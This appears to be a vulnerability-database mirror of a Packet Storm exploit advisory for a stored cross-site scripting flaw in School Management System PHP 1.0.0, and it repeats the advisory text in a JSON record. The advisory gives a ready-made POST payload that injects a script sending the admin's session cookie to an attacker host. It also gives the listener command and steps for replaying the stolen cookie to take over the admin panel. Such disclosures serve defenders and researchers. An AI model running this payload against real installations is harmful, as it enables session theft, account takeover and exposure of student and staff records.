📄 School Management System PHP 1.0.0 Cross Site Scripting

Description

School Management System PHP version 1.0.0 suffers from a persistent cross site scripting vulnerability that can lead to administrative account takeover...

Visit Original Source

Basic Information

ID PACKETSTORM:220054

Published Apr 29, 2026 at 00:00

Affected Product

Affected Versions ====================================================
School Management System PHP - Stored XSS leading to Admin Account Takeover
====================================================

Author: Mehmet Utku Köken
Date: 2026-04-28
CVE: N/A
Vendor Homepage: https://github.com/codingWithElias/school-management-system-php
Version: 1.0.0 (commit f1ac334)
Tested on: Windows 10 / XAMPP / PHP 8.x
Category: Webapps
Platform: PHP

== Description ==

A Stored Cross-Site Scripting (XSS) vulnerability exists in
School Management System PHP. The contact form located at
/req/contact.php fails to sanitize the full_name and message
parameters before storing them in the database. When an
administrator views the messages panel at /admin/message.php,
the stored payload executes within the admin's browser context.
This allows an unauthenticated attacker to steal the admin
session cookie and perform a full account takeover.

== Affected Parameters ==

- full_name
- message

== Affected Files ==

- /req/contact.php (unsanitized input stored)
- /admin/message.php (payload execution)

== Steps to Reproduce ==

1. Navigate to the contact form:
http://TARGET/school-management-system-php/

2. Intercept the POST request and inject the payload
into the full_name or message parameter:

POST /school-management-system-php/req/contact.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded

[email protected]&full_name=<script>new Image().src='http://ATTACKER:8888/?c='+document.cookie</script>&message=hello

3. Start a listener on the attacker machine:

python3 -m http.server 8888

4. Wait for the administrator to visit the messages panel:
http://TARGET/school-management-system-php/admin/message.php

5. The attacker's listener receives the admin session cookie:

GET /?c=PHPSESSID=ao7emtlus8bf87dkpumutl4v3q HTTP/1.1

6. Use the captured session cookie to access the admin panel
without credentials by setting:

Cookie: PHPSESSID=ao7emtlus8bf87dkpumutl4v3q

Then navigate to:
http://TARGET/school-management-system-php/admin/

== Impact ==

An unauthenticated attacker can submit a malicious payload
via the public contact form. Once the administrator views
the messages, the attacker receives the admin PHPSESSID and
gains full administrative access to the application including
student records, teacher data and system configuration.

== References ==

https://owasp.org/www-community/attacks/xss/
https://github.com/codingWithElias/school-management-system-php

{
    "lastseen": "2026-04-29T17:05:17",
    "description": "School Management System PHP version 1.0.0 suffers from a persistent cross site scripting vulnerability that can lead to administrative account takeover...",
    "published": "2026-04-29T00:00:00",
    "modified": "2026-04-29T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 School Management System PHP 1.0.0 Cross Site Scripting",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220054",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "====================================================\n    School Management System PHP - Stored XSS leading to Admin Account Takeover\n    ====================================================\n    \n    Author: Mehmet Utku K\u00f6ken\n    Date: 2026-04-28\n    CVE: N/A \n    Vendor Homepage: https://github.com/codingWithElias/school-management-system-php\n    Version: 1.0.0 (commit f1ac334)\n    Tested on: Windows 10 / XAMPP / PHP 8.x\n    Category: Webapps\n    Platform: PHP\n    \n    == Description ==\n    \n    A Stored Cross-Site Scripting (XSS) vulnerability exists in\n    School Management System PHP. The contact form located at\n    /req/contact.php fails to sanitize the full_name and message\n    parameters before storing them in the database. When an\n    administrator views the messages panel at /admin/message.php,\n    the stored payload executes within the admin's browser context.\n    This allows an unauthenticated attacker to steal the admin\n    session cookie and perform a full account takeover.\n    \n    == Affected Parameters ==\n    \n      - full_name\n      - message\n    \n    == Affected Files ==\n    \n      - /req/contact.php      (unsanitized input stored)\n      - /admin/message.php    (payload execution)\n    \n    == Steps to Reproduce ==\n    \n    1. Navigate to the contact form:\n       http://TARGET/school-management-system-php/\n    \n    2. Intercept the POST request and inject the payload\n       into the full_name or message parameter:\n    \n       POST /school-management-system-php/req/contact.php HTTP/1.1\n       Host: TARGET\n       Content-Type: application/x-www-form-urlencoded\n    \n       [email protected]&full_name=<script>new Image().src='http://ATTACKER:8888/?c='+document.cookie</script>&message=hello\n    \n    3. Start a listener on the attacker machine:\n    \n       python3 -m http.server 8888\n    \n    4. Wait for the administrator to visit the messages panel:\n       http://TARGET/school-management-system-php/admin/message.php\n    \n    5. The attacker's listener receives the admin session cookie:\n    \n       GET /?c=PHPSESSID=ao7emtlus8bf87dkpumutl4v3q HTTP/1.1\n    \n    6. Use the captured session cookie to access the admin panel\n       without credentials by setting:\n    \n       Cookie: PHPSESSID=ao7emtlus8bf87dkpumutl4v3q\n    \n       Then navigate to:\n       http://TARGET/school-management-system-php/admin/\n    \n    == Impact ==\n    \n    An unauthenticated attacker can submit a malicious payload\n    via the public contact form. Once the administrator views\n    the messages, the attacker receives the admin PHPSESSID and\n    gains full administrative access to the application including\n    student records, teacher data and system configuration.\n    \n    \n    == References ==\n    \n    https://owasp.org/www-community/attacks/xss/\n    https://github.com/codingWithElias/school-management-system-php",
    "sourceHref": "https://packetstorm.news/download/220054",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220054/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 School Management System PHP 1.0.0 Cross Site Scripting_PACKETSTORM:220054

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply